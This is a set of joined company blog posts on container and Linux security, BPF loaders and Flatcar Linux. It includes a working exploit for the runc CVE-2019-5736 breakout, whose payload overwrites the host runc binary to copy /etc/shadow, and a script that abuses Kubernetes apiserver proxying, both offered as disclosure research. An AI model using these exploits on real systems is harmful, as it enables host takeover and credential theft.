To further secure the operating system of the physical host, which may also leak information via the L1 data cache when the VM task-switches into the physical host’s kernel via a hypercall, the L1 data cache needs to be flushed before the VM context is entered from the host OS. KVM provides a module parameter / sysctl that will flush caches, via the kvm-intel.vmentry_l1d_flush option (l1d for level-1 data cache). The option can be set to either “always” or “cond” (it can also be deactivated by supplying “never”). “always” will flush the L1 data cache every time a VM is scheduled off a CPU, while “cond” will try to figure out whether a vulnerable code path was executed and only flush if required. This option will impact application performance as the L1D cache will need refilling after each schedule event, which it otherwise would not—but since refilling will happen from the L2 cache, the overall performance impact is expected to be mild.

Securing the Virtualization runtime against L1TF

If we cannot control the guest kernel, and if we also cannot pin vCPUs to pCPUs in a way that multiple VMs do not share L1 caches, we need to work around the L1TF hardware vulnerability by use of software mitigations at the virtualization layer—that is, the bare metal host kernel and hypervisor. These mitigations will impact the overall system performance, though the level of impact is application specific. Software mitigation against L1TF is two-fold. Both attack vectors need to be mitigated:

  1. Secure active VMs against attacks from other VMs being active at the same time
  2. Secure L1 cache data of VMs that are becoming inactive from the next VM that’s to use the same physical CPU, or by the host OS (see above).

To mitigate 1., either the Hyperthreading or the EPT CPU feature needs to be disabled on the physical virtualization host. While the performance impact is application specific, overall performance gains published at the time the respective technology was introduced suggest it may be less painful to disable Hyperthreading over deactivating EPT. In any case, operators should monitor the impact on their real-life workloads, and experiment with changing mitigations to determine the least painful measure.

In order to prevent data leaks via the L1 cache after a VM was scheduled off a pCPU, the L1 cache must be flushed before the next VM starts using that pCPU, similar to the physical OS protection discussed in the previous section. The same mechanism via KVM’s kvm-intel.vmentry_l1d_flush option applies here.

Future outlook / potential long-term options

Caches and Hyperthreading in particular has been under sustained attack from this new generation of hardware-level information disclosures, with security researchers warning about potential inherent vulnerabilities, and e.g. the OpenBSD distribution disabling Hyperthreading completely for security reasons. However, even when factoring in the vulnerability drawbacks, valid use-cases for hyperthreading remain. For example, a multi-threaded application, which does share its memory with its threads anay, would benefit without being vulnerable per se. However, currently no scheduler exists in the Linux kernel that is advanced enough to perform this level of scheduling—appointing sets of processes or threads to a set of cores or hyperthreads of the same core, while locking out all other processes from those cores.

But something is in the works. A patch-set of no less than 60 individual patches proposed to the Linux kernel’s CFQ scheduler in September 2018 started a discussion about adding co-scheduling capabilities to Linux. While this particular patch-set appears to have been abandoned (with the discussion apparently concluded), the general direction of this work continues to be pursued. More recently the maintainer of the Linux scheduler subsystem, Peter Zijlstra, proposed his own patch series to tackle this feature.

If you need help improving the security of your Kubernetes environment, please contact us at [email protected].

runc “breakout” Vulnerability Mitigated on Flatcar Linux

Last week, a high severity vulnerability was disclosed by the maintainers of runc, under the name CVE-2019-5736: runc container breakout. This vulnerability has high severity (CVSS score 7.2) because it allows a malicious container to overwrite the host runc binary and gain root privileges on the host. According to our research, however, when using Flatcar Linux with its read-only filesystems this vulnerability is not exploitable.

runc vulnerability background

In the context of our security work, we had been asked to evaluate the report’s severity with respect to the client’s installation. In the course of this evaluation, we wrote an exploit in order to understand how it works and to test if their installation was vulnerable. While we did recognize the severity of the issue, we also ascertained that the client was not affected. To understand this, let’s take a look at how things should work versus what could happen if the exploit was successfully executed.

How containers should work

Let’s first look at the following diagram showing how runc should work.

runc forks a new process that becomes the pid1 of the container. Following the traditional fork/exec Unix model, that process is so far only a copy of the parent process and therefore still runs the “runc” program. /proc/self/exe points to runc while running in the container.

Then, pid1 will execute the entrypoint in the container, meaning the program running will be substituted to the program in the container.

How our runc exploit works

The runc exploit code changes the  normal behaviour in the following ways

  • Instead of executing our own program in the container, we set the entrypoint to /proc/self/exe, meaning runc will run runc again. So /proc/1/exe will be a reference to runc for a longer time.

  • However, we don’t want to run the runc code. With LD_PRELOAD, we will execute a routine that will sleep for a few seconds in order to keep the reference /proc/1/exe for the next step.

  • During those few seconds, we have enough time to enter the container with runc exec and open a reference to /proc/1/exe, while it is still pointing to runc (file descriptor 10 in our exploit).

  • At this point, we cannot open runc in read-write mode because pid1 is still running runc. We would get the error “text busy” if we tried.

  • The sleep in pid1 terminates and executes something else (another sleep but via /bin/sh so pid1 does not lock runc).

  • Finally, we have a temporary read-only file descriptor to the runc binary on the host filesystem and we use tee /proc/self/fd/10 to acquire a new file descriptor in write mode and to overwrite the runc binary.

Our exploit container image is simply a LD_PRELOAD program:

FROM fedora:latest
RUN ln -s /proc/self/exe /exe
RUN dnf install -y gcc
RUN mkdir -p /src
COPY foo.c /
RUN gcc -Wall -o / -shared -fPIC /foo.c -ldl
CMD [ "/usr/bin/sh" ]

Here is the source code:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

static void __myinit(void) __attribute__((constructor));
static void __myinit(void)
  int pid;

  pid = getpid();
  if (pid == 1) {
    printf("I am pid 1. Sleeping 3 seconds...\n");
    printf("I am pid 1. Sleeping forever...\n");
    execl("/bin/sh", "sh", "-c",
          "/bin/sleep 1000",
          (char *) 0);

  printf("I am pid %d. Starting Hijack...\n", pid);
  execl("/bin/sh", "sh", "-c",
        "exec 10< /proc/1/exe ; "
        "echo Lookup inode of /proc/1/exe: ; "
        "stat -L --format=%i /proc/1/exe ; "
        "echo sleep 4 ; "
        "sleep 4 ; "
        "printf '#!/bin/sh\\ncp /etc/shadow /home/ubuntu/\\nchmod 444 /home/ubuntu/shadow\\n' | tee /proc/self/fd/10 > /dev/null ; "
        "echo done ; ",
        (char *) 0);


This program is a single function compiled into, loaded via the environment variable $LD_PRELOAD. It will be executed both as the initial process in the container (pid 1) and whenever entering in the container with docker exec. If it’s running as pid 1 (if (pid == 1)), it will run the red part of the diagram above. If it’s running via docker enter, it will run the bottom part of the diagram above.

Running the exploit on Ubuntu

When trying this on Ubuntu, we can overwrite runc on the host.

When executing the exploit, /usr/bin/docker-runc is overwritten by the malicious script that copies the password file /etc/shadow from the host, making it available for others to read.

Trying the exploit on Flatcar Linux

Then, we tried the same exploit on Flatcar Linux and we couldn’t reach the same result.

Flatcar Linux mounts /usr in read-only mode, protecting most programs from being overwritten. However, this test does not use runc  from /usr/bin/runc but from /run/torcx/unpack/docker/bin/runc (managed by torcx). But torcx also uses a read-only mount for the programs, so it is protected the same way.


As we have demonstrated, the read-only filesystems feature of Flatcar Linux is capable of mitigating this runc vulnerability. It can also help against similar exploits of this class. In addition, Flatcar Linux delivers updates automatically, including security fixes. These are some of the reasons we are pushing Flatcar Linux forward and using it as the base for our upcoming open source products.

Since developing our own exploit, the researchers who found this vulnerability and the maintainers of runc also published their exploit, working in a similar way:

If you want to learn more about Flatcar Linux, head over to

If you need help with security assessments, penetration testing, or engineering services contact us at [email protected].

Abusing Kubernetes API server proxying

The Kubernetes API server proxy allows a user outside of a Kubernetes cluster to connect to cluster IPs which otherwise might not be reachable. For example, this allows accessing a service which is only exposed within the cluster’s network. The apiserver acts as a proxy and bastion between user and in-cluster endpoint.

API server proxy security advisory

Last summer, while performing penetration testing, we found an issue with Kubernetes API server proxying. We took this discovery to the private Kubernetes security list which recently lead to a security advisory.

Operators of the API server are strongly advised to operate the Kubernetes API server in the same network as the nodes or firewall it sufficiently. It is highly recommended to not run any other services you wish to be secure and isolated on the same network as the cluster unless you firewall it away from the cluster, specifically any outbound connections from the API server to anything else. The Kubernetes control plane has many user-configurable features (aggregated APIs, dynamic admission webhooks, and conversion webhooks coming soon) which involve the Kubernetes API server sourcing network traffic.

Prior to the advisory an update to Kubernetes was made where proxy functionality was disabled for loopback and link-local addresses. That makes it no longer possible to abuse apiserver proxying for pods to reach, for example, sidecar containers or the well-known link-local address This address is commonly used for meta data services in cloud environments (e.g. AWS) and often gives access to secret data.

API server remains open to abuse

It’s great that we’ve now got those cases covered, but the apiserver still can be abused as an open HTTP proxy. Thus, it remains crucial to isolate the network correctly. Let’s take a closer look to understand why this is.

The interesting question to investigate is, “Can we trick the apiserver into connecting to IP addresses that are not part of the cluster’s network and not assigned to a pod or service in the cluster?” Additionally, in a Kubernetes setup where the Kubernetes API server is operated in a different network than the worker nodes (as for example on GKE): can we abuse the apiserver’s built-in proxy to send requests to IP addresses within the apiserver’s network or to sidecar containers of it (in a self-hosted Kubernetes cluster) that are not meant to be reachable for users at all?

When the apiserver receives a proxy request for a service or pod, it looks up an endpoint or pod IP address to forward the request to. Both endpoint and pod IP are populated from the pod’s status which contains the podIP field as reported by the kubelet. So what happens if we send our own pod status for a nginx pod as shown in the following script?


set -euo pipefail

readonly PORT=8001
readonly POD=nginx-7db75b8b78-r7p79
readonly TARGETIP=

while true; do
  curl -v -H 'Content-Type: application/json' \
    "http://localhost:${PORT}/api/v1/namespaces/default/pods/${POD}/status" >"${POD}-orig.json"

  cat $POD-orig.json |
    sed 's/"podIP": ".*",/"podIP": "'${TARGETIP}'",/g' \

  curl -v -H 'Content-Type:application/merge-patch+json' \
    -X PATCH -d "@${POD}-patched.json" \

  rm -f "${POD}-orig.json" "${POD}-patched.json"

From the apiserver’s perspective, the pod now has IP address When we try to connect to the pod via kubectl proxy, the apiserver will in fact establish a HTTP connection to, our target IP.

curl localhost:8001/api/v1/namespaces/default/pods/nginx-7db75b8b78-r7p79/proxy/
<a href="//"/><span id="logo" aria-label="Google"></span></a>

As demonstrated, we can indeed trick the apiserver. The moral of this story is to follow the advisory’s recommendation and isolate your network properly.

If you need help improving the security of your Kubernetes environment, please contact us at [email protected].

Kinvolk welcomes Thilo Fromm as Director of Engineering

Today we are pleased to announce Thilo Fromm has joined Kinvolk as Director of Engineering. He comes to us via Amazon Web Services where he we was a Technical Project Manager on the EC2 team. Before that he worked at ProfitBricks on virtual machine and cloud-focused Linux kernel projects.

As Director of Engineering, Thilo will be responsible for overseeing our engineering team and its efforts. He brings with him a valuable combination of technical expertise and project management skills that will be crucial in helping us grow our engineering team and expand our technical service and product offerings. The result will be increased value to our clients and the open source projects and communities to which we contribute.

Our guiding principle at Kinvolk is to be a valuable contributor to the open-source projects and communities that we participate in. With the addition of Thilo, the Kinvolk team gains another long-time contributor and supporter of open-source Linux projects. His passion for free and open-source software mirrors that of the founding team, making Thilo a perfect fit.

Adding Thilo to the team kicks off a very exciting 2019 for Kinvolk. Over the next few months, we will be announcing new products, services and events. In order to deliver those, we’ll be announcing further additions to the leadership team in the near future. Stay tuned for those announcements and other posts by subscribing to our channels.

Improving Kubernetes Security

In summer 2018, the Gardener project team asked Kinvolk to execute several penetration tests in its role as a third-party contractor. We applied our Kubernetes expertise to identify vulnerabilities on Gardener installations and to make recommendations.

Some of our findings are now presented in this article on the Gardener website.

We presented some of our findings in a joint presentation with SAP entitled Hardening Multi-Cloud Kubernetes Clusters as a Service at KubeCon 2018 in Shanghai. The slides in PDF and the video recording are now available.

We also presented it at the Gardener Bi-weekly Meeting, see the agenda for Friday 7 Dec 2018.

If you need help with penetration testing your installation, please contact us at [email protected].

Exploring BPF ELF Loaders at the BPF Hackfest

Just before the All Systems Go! conference, we had a BPF Hackfest at the Kinvolk office and one of the topics of discussion was to document different BPF ELF loaders. This blog post is the result of it.

BPF is a new technology in the Linux kernel, which allows running custom code attached to kernel functions, network cards, or sockets amongst others. Since it is very versatile a plethora of tools can be used to work with BPF code: perf record, tc from iproute2, libbcc, etc. Each of these tools has a different focus, but they use the same Linux facilities to achieve their goals. This post documents the steps they use to load BPF into the kernel.

Common steps

BPF is usually compiled from C, using clang, and “linked” into a single ELF file. The exact format of the ELF file depends on the specific tool, but there are some common points. ELF sections are used to distinguish map definitions and executable code. Each code section usually contains a single, fully inlined function.

The loader creates maps from the definition in the ELF using the bpf(BPF_MAP_CREATE) syscall and saves the returned file descriptors [1]. This is where the first complication comes in, because the loader now has to rewrite all references to a particular map with the file descriptor returned by the bpf() syscall. It does this by iterating through the symbol and relocation tables contained in the ELF, which yields an offset into a code section. It then patches the instruction at that offset to use the correct fd [2].

After this fixup is done, the loader uses bpf(BPF_PROG_LOAD) with the patched bytecode [3]. The BPF verifier resolves map fds to the in-kernel data structure, and verifies that the code is using the maps correctly. The kernel rejects the code if it references invalid file descriptors. This means that the outcome of BPF_PROG_LOAD depends on the environment of the calling process.

After the BPF program is successfully loaded, it can be attached to a variety of kernel subsystems [4]. Some subsystems use a simple syscall (e.g. SO_ATTACH), while others require netlink messages (XDP) or manipulating the tracefs (kprobes, tracepoints).

Small differences between BPF ELF loaders

The different loaders offer different features and for that reason use slightly different conventions in the ELF file. The ELF conventions are not part of the Linux ABI. It means that an ELF file prepared for one loader usually cannot just be loaded by another one. The map definition struct (struct bpf_elf_map in the schema) is the main varying part.

BPF ELF loader \ Features Maps in maps Pinning NUMA node bpf2bpf function call
libbpf (Linux kernel) map def no no Yes (via samples) Yes
Perf map def no no no yes
iproute2 / tc map def yes Yes (none, object, global) no Yes
gobpf map def Not yet Yes (none, object, global, custom) no no
newtools/ebpf yes no no yes

There are other varying parts in loader ELF conventions that we found noteworthy:

  • Some use one ELF section per map, some use one “maps” sections for all the maps.
  • The naming of the sections and the function entrypoint vary. Some have default section names that can be overriden in the CLI (tc), some requires well-defined prefixes (“kprobe”, “kretprobes/”).
  • Some use csv-style parameters in the section name (perf), some give an API in Go to programatically change the loader’s behaviour.


BPF is actively developed in the Linux kernel and whenever a new feature is implemented, BPF ELF loader might need an update as well to support it. The different BPF ELF loaders have different focuses and might not add support of all BPF kernel new features at the same speed. There are efforts underway to standardise on libbpf as the canonical implementation. The plan is to ship libbpf with the kernel, which means it will set the de-facto standard for user space BPF support.

Flatcar Linux is now open to the public

A few weeks ago we announced Flatcar Linux, our effort to create a commercially supported fork of CoreOS’ container Linux. You can find the reasoning for the fork in our FAQ.

Since then we’ve been testing, improving our build process, establishing security procedures, and talking to testers about their experiences. We are now satisfied that Flatcar Linux is a stable and reliable container operating system that can be used in production clusters.

Open to the public

Thus, today we are ready to open Flatcar Linux to the public. Thanks to our testers for testing and providing feedback. We look forward to more feedback and community feedback now that Flatcar is more widely available.

For information about release and signing keys, please see the new Releases and the image signing key pages.

Filing issues or feature requests

You can use the Flatcar repository to file any issue or feature request you may have.

Flatcar Linux documentation

We are also happy to announce the initial release of our Flatcar Documentation. You can find information about installing and running Flatcar there.

Communication channels

We’ve created a mailing list and IRC channels to facilitate communications between users and developers of Flatcar Linux.

Please join those to talk about Flatcar Linux and discuss any issues or ideas you have. We look forward to hearing from you there!

Flatcar Linux @ Kubecon EU

The Kinvolk team will be on hand at Kubecon EU to discuss Flatcar Linux. Come by booth SU-C23 and say “Hi!".


Flatcar Linux would not exist without Container Linux. Thanks to the CoreOS team for building it and we look forward to continued cooperation with their team.

Please follow Kinvolk and the Flatcar Linux project on twitter to stay informed about commercial support and other Flatcar Linux updates in the coming weeks and months.

Towards unprivileged container builds

Once upon a time, software was built and installed with the classic triptych ./configure, make, make install. The build part with make didn’t need to be run as root, which was, in fact, discouraged.

Later, software started being distributed through package managers and built with rpm or dpkg-buildpackage. Building packages as root was still unnecessary and discouraged. Since rpm or deb packages are just archive files, there shouldn’t be any need for privileged operations to build them. After all, we don’t need the ability to load a kernel module or reconfigure the network to create an archive file.

Why should we avoid building software as root? First, to avoid potential collateral damage to the developer’s machine. Second, to avoid being compromised by potentially untrusted resources. This is especially important for build services where anyone can submit a build job: the administrators of the build service have to protect their services against potentially malicious build submissions.

Nowadays, more and more software in cloud infrastructure is built and distributed as container images. Whether it is a Docker image, an OCI bundle, ACI or another format, this is not so different from an archive file. And yet, the majority of container images are built via a Dockerfile with the Docker Engine, which, along with most of its operations, mostly runs as root.

This makes life difficult for build services that want to offer container builds to users that are not necessarily trusted. How did we dig ourselves into this hole?

Why does docker build need root?

There are two reasons why docker build needs root: the build command requires root for some images and to setup the build container.

Run commands with privileges

Dockerfiles allow executing arbitrary commands inside the container environment that it is building with the “RUN” command. This makes the build very convenient: users can use “apt” on Ubuntu based images to install additional packages and they will not be installed on the host but in the container that is being built. This alone requires root access in the container because “apt” will need to install files in directories that are only writable by root.

Starting the build container

To be able to execute those “RUN” commands in the container, “docker build” needs to start this build container first. To start any container, Docker needs to perform the following privileged operations, among others:

  • Preparing an overlay filesystem. This is necessary to keep track of the changes compared to the base image and requires CAP_SYS_ADMIN to mount.
  • Creating new Linux namespaces (sometimes called “unsharing”): mount namespace, pid namespace, etc. All of them (except one, we will see below) require the CAP_SYS_ADMIN capability.
  • pivot_root or chroot, which also require CAP_SYS_ADMIN or CAP_SYS_CHROOT.
  • Mounting basic filesystems like /proc. The “RUN” command can execute arbitrary shell scripts, which often require a properly set up /proc.
  • Preparing basic device nodes like /dev/null, /dev/zero. This is also necessary for a lot of shell scripts. Depending on how they are prepared, this requires either CAP_MKNOD or CAP_SYS_ADMIN.

Only root can perform these operations:

Operation Capability required Without root?
Mount a new overlayfs CAP_SYS_ADMIN
Create new (non-user) namespace CAP_SYS_ADMIN
Chroot or pivot_root CAP_CHROOT or CAP_SYS_ADMIN
Mount a new procfs CAP_SYS_ADMIN
Prepare basic device nodes CAP_MKNOD or CAP_SYS_ADMIN

This blog post will focus on some of those operations in detail. This is not an exhaustive list. For example, preparing basic device nodes is not covered in this blog post.

Projects similar to docker-build

There are other projects to build docker containers that aim to be unprivileged. Some want to support builds from a Dockerfile.

  • img: Standalone, daemon-less, unprivileged Dockerfile and OCI compatible container image builder.
  • buildah: A tool that facilitates building OCI images
  • kaniko
  • orca-build

They could be a building block for CI services or serverless frameworks which need to build a container image for each function.

Where user namespaces come into play

In the same way that other Linux namespaces restrict the visibility of resources to processes inside the namespace, processes in user namespaces only see a subset of all possible users and groups. In the initial user namespace, there are approximately 4294967296 (2^32) possible users. The range goes from 0, for the superuser or root, to 2^32-1.

uid mappings

When setting up a user namespace, container runtimes allocate a range of uids and specify a uid mapping. The mapping means that uid 0 (root) in the container could be mapped to uid 100000 on the host. Root being relative means that capabilities are always relative to a specific user namespace. We will come back to that.

Nested user namespaces

User namespaces can be nested. The inner namespace will have the same amount (or, usually, fewer) uids than the outer namespace. Not all uids from the outer namespace are mapped, but those which are are mapped in a bijective, one-to-one way.

Unprivileged user namespaces

As opposed to all other kinds of Linux namespaces, user namespaces can be created by an unprivileged user (without CAP_SYS_ADMIN). In this case, the uid mapping is restricted to a single uid. In the example below, uid 1000 on the host is mapped to root (uid 0) in the yellow container.

Once the new unprivileged user namespace is created, the process inside is root from the point of view of the container and therefore it has CAP_SYS_ADMIN, so it could create other kinds of namespaces.

This is a useful building block for our goal of unprivileged container builds.

Operation Capability required Without root?
Mount a new overlayfs CAP_SYS_ADMIN
Create new user namespace No capability required (*)
Create new (non-user) namespace CAP_SYS_ADMIN
Chroot or pivot_root CAP_CHROOT or CAP_SYS_ADMIN
Mount a new procfs CAP_SYS_ADMIN
Prepare basic device nodes CAP_MKNOD or CAP_SYS_ADMIN

(*): No capability is required as long as all of the following is respected: your kernel is built with CONFIG_USER_NS=y your Linux distribution does not add a distro-specific knob to restrict it (sysctl kernel.unprivileged_userns_clone on Arch Linux) your uid mappings respect the restriction mentioned above seccomp is not blocking the unshare system call (as it could be in some Docker profiles)

Each Linux namespace is owned by a user namespace

Each Linux namespace instance, no matter what kind (mount, pid, etc.), has a user namespace owner. It is the user namespace where the process that created it sits. When several kinds of Linux namespaces are created in a single syscall, the newly created user namespace owns the other newly created namespaces.


The ownership of those namespaces is important because for most operations, the kernel will check that when determining whether a process has the proper capability.

In the example below, a process attempts to perform a pivot_root() syscall. To succeed, it needs to have CAP_SYS_ADMIN in the user namespace that owns the mount namespace where the process is located. In other words, having CAP_SYS_ADMIN in a unprivileged user namespaces does not allow you to “escape” the container and get more privileges outside.

This is done in the function may_mount():

ns_capable(current->nsproxy->mnt_ns->user_ns, CAP_SYS_ADMIN);

The function ns_capable() checks if the current process has the CAP_SYS_ADMIN capability within the user namespace that owns the mount namespace (mnt_ns) where the current process is located (current->nsproxy).

So by creating the new mount namespace inside the unprivileged user namespace we could do more. We can check our progress, what we achieved so far:

Operation Capability required Without root?
Mount a new overlayfs CAP_SYS_ADMIN
Create new user namespace No capability required (*)
Create new (non-user) namespace CAP_SYS_ADMIN
Chroot or pivot_root CAP_CHROOT or CAP_SYS_ADMIN
Mount a new procfs CAP_SYS_ADMIN
Prepare basic device nodes CAP_MKNOD or CAP_SYS_ADMIN

What about mounting the new overlayfs?

We’ve seen that pivot_root() can be done without privileges by creating a new mount namespace owned by a new unprivileged user namespace. Isn’t this the same for mounting the new overlayfs? Granted, the mount() syscall is guarded by exactly the same call to ns_capable() that we have seen above for pivot_root(). Unfortunately, that’s not enough.

New mounts vs bind mounts

The mount system call can perform distinct actions:

  • New mounts: this mounts a filesystem that was not mounted before. A block device might be provided if the filesystem type requires one (ext4, vfat). Some filesystems don’t need a block device (FUSE, NFS, sysfs). But in any case, the kernel maintains a struct super_block to keep track of options such as read-only.

  • Bind mounts: a filesystem can be mounted on several mountpoints. A bind mount adds a new mountpoint from an existing mount. This will not create a new superblock but reuse it. The aforementioned “read-only” option can be set at the superblock level but also at the mountpoint level. In the example below, /mnt/data is bind-mounted on /mnt/foo so they share the same superblock. It can be achieved with:

mount /dev/sdc /mnt/data		# new mount
mount --bind /mnt/data /mnt/foo	# bind mount
  • Change options on an existing mount. This can be superblock options, per-mountpoint options or propagation options (most useful when having several mount namespaces).

Each superblock has a user namespace owner. Each mount has a mount namespace owner. To create a new bind mount, having CAP_SYS_ADMIN in the user namespace that owns the mount namespace where the process is located is normally enough (we’ll see some exceptions later). But creating a new mount in a non-initial user namespace is only allowed in some filesystem types. You can find the list in the Linux git repository with:

$ git grep -nw FS_USERNS_MOUNT

It is allowed in procfs, tmpfs, sysfs, cgroupfs and a few others. It is disallowed in ext4, NFS, FUSE, overlayfs and most of them actually.

So mounting a new overlayfs without privileges for container builds seems impossible. At least with upstream Linux kernels: Ubuntu kernels had for some time the ability to do new mounts of overlayfs and FUSE in an unprivileged user namespace by adding the flag FS_USERNS_MOUNT on those 2 filesystem types along with necessary fixes.

Kinvolk worked with a client to contribute to the upstreaming effort of the FUSE-part of patches. Once everything is upstream, we will be able to mount overlayfs.

The FUSE mount will be upstreamed first, before the overlayfs. At that point, overlayfs could theoretically be re-implemented in userspace with a FUSE driver.

Operation Capability required Without root?
Mount a new overlayfs CAP_SYS_ADMIN ✅ (soon)
Create new user namespace No capability required (*)
Create new (non-user) namespace CAP_SYS_ADMIN
Chroot or pivot_root CAP_CHROOT or CAP_SYS_ADMIN
Mount a new procfs CAP_SYS_ADMIN
Prepare basic device nodes CAP_MKNOD or CAP_SYS_ADMIN

What about procfs?

As noted above, procfs has the FS_USERNS_MOUNT flag so it is possible to mount it in an unprivileged user namespace. Unfortunately, there are other restrictions which block us in practice in Docker or Kubernetes environments.

What are locked mounts?

To explain locked mounts, we’ll first have a look at systemd’s sandboxing features. It has a feature to run services in a different mount namespace so that specific files and directories are read-only (ReadOnlyPaths=) or inaccessible (InaccessiblePaths=). The read-only part is implemented by bind-mounting the file or directory over itself and changing the mountpoint option to read-only. The inaccessible part is done by bind-mounting an empty file or an empty directory on the mountpoint, hiding what was there before.

Using bind mounts as a security measure to make files read-only or inaccessible is not unique to systemd: container runtimes do the same. This is only secure as long as the application cannot umount that bind mount or move it away to see what was hidden under it. Both umount and moving a mount away (MS_MOVE) can be done with CAP_SYS_ADMIN, so systemd documentation suggests to not give that capability to a service if such sandboxing features were to be effective. Similarly, Docker and rkt don’t give CAP_SYS_ADMIN by default.

We can imagine another way to circumvent bind mounts to see what’s under the mountpoint: using unprivileged user namespaces. Applications don’t need privileges to create a new mount namespace inside a new unprivileged user namespace and then have CAP_SYS_ADMIN there. Once there, what’s preventing the application from removing the mountpoint with CAP_SYS_ADMIN? The answer is that the kernel detects such situations and marks mountpoints inside a mount namespace owned by an unprivileged user namespace as locked (flag MNT_LOCK) if they were created while cloning the mount namespace belonging to a more privileged user namespace. Those cannot be umounted or moved.

Let me describe what’s in this diagram:

  • On the left: the host mount namespace with a /home directory for Alice and Bob.

  • In the middle: a mount namespace for a systemd service that was started with the option “ProtectHome=yes”. /home is masked by a mount, hiding the alice and bob subdirectories.

  • On the right: a mount namespace created by the aforementioned systemd service, inside a unprivileged user namespace, attempting to umount /home in order to see what’s under it. But /home is a locked mount, so it cannot be unmounted there.

The exception of procfs and sysfs

The explanation about locked mounts is valid for all filesystems, including procfs and sysfs but that’s not the full story. Indeed, in the build container, we normally don’t do a bind mount of procfs but a new mount because we are inside a new pid namespace, so we want a new procfs that reflects that.

New mounts are normally independent from each other, so a masked path in a mount would not prevent another new mount: if /home is mounted from /dev/sdb and has masked paths, it should not influence /var/www mounted from /dev/sdc in any way.

But procfs and sysfs are different: some files there are singletons: for example, the file /proc/kcore refers to the same kernel object, even if it is accessed from different mounts. Docker masks the following files in /proc:

$ sudo docker run -ti --rm busybox mount | grep /proc/
proc on /proc/asound type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/kcore type tmpfs (rw,context="...",nosuid,mode=755)
tmpfs on /proc/latency_stats type tmpfs (rw,context="...",nosuid,mode=755)
tmpfs on /proc/timer_list type tmpfs (rw,context="...",nosuid,mode=755)
tmpfs on /proc/sched_debug type tmpfs (rw,context="...",nosuid,mode=755)
tmpfs on /proc/scsi type tmpfs (ro,seclabel,relatime)

The capability needed to circumvent the restriction on those files is normally CAP_SYS_ADMIN (for e.g. umount). To prevent a process without CAP_SYS_ADMIN from accessing those masked files by mounting a new procfs mount inside a new unprivileged user namespace and new mount namespace, the kernel uses the function mount_too_revealing() to check that procfs is already fully visible. If not, the new procfs mount is denied.

Protected by Protection applies for filesystem types
Bind mounts Locked mounts (MNT_LOCK) all
New mounts mount_too_revealing() procfs and sysfs

This is blocking us from mounting procfs from within a Kubernetes pod.

Several workarounds are possible:

  • Avoid mounting procfs in the build environment and update Dockerfiles that depend on it.
  • Using a Kubernetes container with privileges, so that /proc in the Docker container is not covered. A “rawproc” option in Kubernetes is being discussed with the underlying implementation in moby.
  • Changing the kernel to allow a new procfs mount in an unprivileged user namespace, even when the parent proc mount is not fully visible, but with the same masks in the child proc mount. I started this discussion in a RFC patch and there is an alternative proposal by Djalal Harouni to fix procfs more generally.


As you can see there are a lot of moving parts, as is the general case with Linux containers. But this is an area where development is quite active at the moment and hope for progress is greater than it has ever been. This blog post explored some aspects of the underlying mechanisms on Linux that are being worked on for unprivileged container builds: user namespaces, mounts, some filesystems. We hope to bring you updates about unprivileged container builds in the future and especially about our own involvement in these efforts.

Kinvolk’s offerings

Kinvolk is an engineering team based in Berlin working on Linux, Containers and Kubernetes. We combine our expertise of low-level Linux details like capabilities, user namespaces and the details of FUSE with our expertise of Kubernetes to offer specialised services for your infrastructure that goes all the way down the stack. Contact us at [email protected] to learn more about what Kinvolk does.

Announcing the Flatcar Linux project

Today Kinvolk announces Flatcar Linux, an immutable Linux distribution for containers. With this announcement, Kinvolk is opening the Flatcar Linux project to early testers. If you are interested in becoming a tester and willing to provide feedback, please let us know.

Flatcar Linux is a friendly fork of CoreOS’ Container Linux and as such, compatible with it. It is independently built, distributed and supported by the Kinvolk team.

Why fork Container Linux?

At Kinvolk, we provide support and engineering services for foundational open-source Linux projects used in cloud infrastructure. Last year we started getting inquiries about providing support for Container Linux. Since those inquiries, we had been thinking about how we could offer such support.

When we are typically asked to provide support for projects that we do not maintain–a common occurence–, the process is rather simple. We work with the upstream maintainers to evaluate whether a change would be acceptable and attempt to get that work into the upstream project. If that change is not acceptable to the upstream project and a client needs it, we can create a patch set that we maintain and provide our own release builds. Thus, it is straightforward to provide commercial support for upstream projects.

Providing commercial support for a Linux distribution is more difficult and can not be done without having full control over the means of building, signing and delivering the operating system images and updates. Thus, our conclusion was that forking the project would be required.

Why now?

With the announcement of Red Hat’s acquisition of CoreOS, many in the cloud native community quickly asked, “What is going to happen to Container Linux?” We were pleased when Rob announced Red Hat’s commitment to maintaining Container Linux as a community project. But these events bring up two issues that Flatcar Linux aims to address.

The strongest open source projects have multiple commercial vendors that collaborate together in a mutually beneficial relationship. This increases the bus factor for a project. Container Linux has a bus factor of 1. The introduction of Flatcar Linux brings that to 2.

While we are hopeful that Red Hat is committed to maintaining Container Linux as an open source project, we feel that it is important that open source projects, especially those that are at the core of your system, have strong commercial support.

Road to general availability

Over the next month or so, we will be going through a testing phase. We will focus on responding to feedback that we receive from testers. We will also concentrate on improving processes and our build and delivery pipeline. Once the team is satisfied that the release images are working well and we are able to reliably deliver images and updates, we will make the project generally available. To receive notification when this happen, sign up for project updates.

How can I help?

We are looking for help testing builds and providing feedback. Let us know if you’d be able to test images here.

We are also looking for vendors that could donate caching, hosting and other infrastructure services to the project. You can contact us about this at [email protected].

More information

For more information, please see the project FAQ.

Follow Flatcar Linux and Kinvolk on Twitter to get updates about the Flatcar Linux project.

Kinvolk is now a Kubernetes Certified Service Provider

The Kinvolk team is proud to announce that we are now a Kubernetes Certified Service Provider. We join an esteemed group of organizations that provide valuable services to the Kubernetes community.

Kubernetes Certified Service Providers are vetted service companies that have at least 3 Certified Kubernetes Administrators on staff, have a track record of providing development and operation services to companies, and have that work used in production.

At Kinvolk, we have collaborated with leading companies in the cloud-native community to help build cloud infrastructure technologies that integrate optimally with Linux. Companies come to Kinvolk because of our unique mix of core Linux knowledge combined with well-documented experience in applying that knowledge to modern cloud infrastructure projects. We look forward to continuing such collaborations with more partners in the Kubernetes community.

To learn more about how our team can help you build or improve your products, or the open source projects you rely on, contact us at [email protected].

